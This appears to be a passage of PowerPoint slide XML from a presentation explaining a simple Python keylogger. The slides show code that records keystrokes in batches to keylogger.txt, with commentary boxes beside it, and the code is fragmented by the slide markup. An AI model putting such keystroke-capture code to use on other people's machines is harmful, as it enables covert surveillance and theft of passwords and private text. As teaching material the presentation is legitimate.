                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF3020C-46A5-4CCB-9D69-DBB621A3D3A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593672" y="5230220"/>
            <a:ext cx="3733799" cy="1569660"/>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//here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">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datetime.now</a:t>
            </a:r>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 for obtain current date &amp; time . Here we have to remove the milliseconds of the time hence we write str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">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datetime.now</a:t>
            </a:r>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()))[:-7]+ ,it removes first to last six values of the string which contains milliseconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344370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4E504A-AF02-4444-84AE-586207709008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="58846"/>
            <a:ext cx="8763000" cy="6370975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    global count, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keys.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    count += 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if count &gt;= 5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        count = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>write_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(keys)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        keys = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if key == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Key.esc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return False </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>write_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(keys):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    with open("keylogger.txt", "a") as f:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>idx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, key in enumerate(keys):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            k = str(key).replace("'", "")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>k.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("space") &gt; 0 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>k.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("backspace") == -1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A197B20D-BE36-4CC0-A06C-8D42C66EB38B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="308450"/>
            <a:ext cx="57912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//here declaring global for initiating data type that work all together</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D657B7DC-826B-430C-8015-80E43205FB2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487336" y="612665"/>
            <a:ext cx="37719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//appending the key strokes in the list</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23BBC4D9-A388-490C-A669-B088F6CB858F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1019371"/>
            <a:ext cx="65532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//here for relevance of the program we saving 5 key strokes in array at a time </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C89697-0642-4823-8713-20F853B4D896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="1289247"/>
            <a:ext cx="32004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 counting zero for next array</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE7E8F35-F6F1-4248-9558-BC6CF3B06DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2450104"/>
            <a:ext cx="22860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//by default key= pass</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C1BD22E-2D54-4B49-8A9E-A089BBAD6EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2724150" y="2798370"/>
            <a:ext cx="6324600" cy="584775"/>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 here if esc Butten pressed then it returns false means it exits the program </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF1636FF-FCC2-44C7-8078-2F9DADD7C8FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2481132" y="3314467"/>
            <a:ext cx="58674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 if we don’t to stop with esc button then we will write pass</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BF1B360-5FD0-48AD-88B8-F2CC2FEE1CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4849536" y="4215160"/>
            <a:ext cx="28194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//again opening txt file as f</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70486A43-428F-49BE-86B0-F71AAEB1FFC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="4683278"/>
            <a:ext cx="3657600" cy="584775"/>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//here we replacing the single cote with blank space </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B545FAA-EB90-4D46-B7B9-97CBD7535EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5482003"/>
            <a:ext cx="38481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//here if there is space then follow next row</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00BC306A-C2D0-4CEB-AB66-AD7997E3AFB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="5694302"/>
            <a:ext cx="4572000" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("\n")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>k.find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Key") == -1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(k)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8650B61F-00F6-45B9-B51A-BBBB09A7ABAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="5908173"/>
            <a:ext cx="4572000" cy="584775"/>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//here we don’t recording the other keys like shift key, tab key etc. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304290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79F44F-C21E-4C9F-B827-08749B44A5BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="8458200" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if __name__ == "__main__":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="0" dirty="0">
                <a:effectLst/>
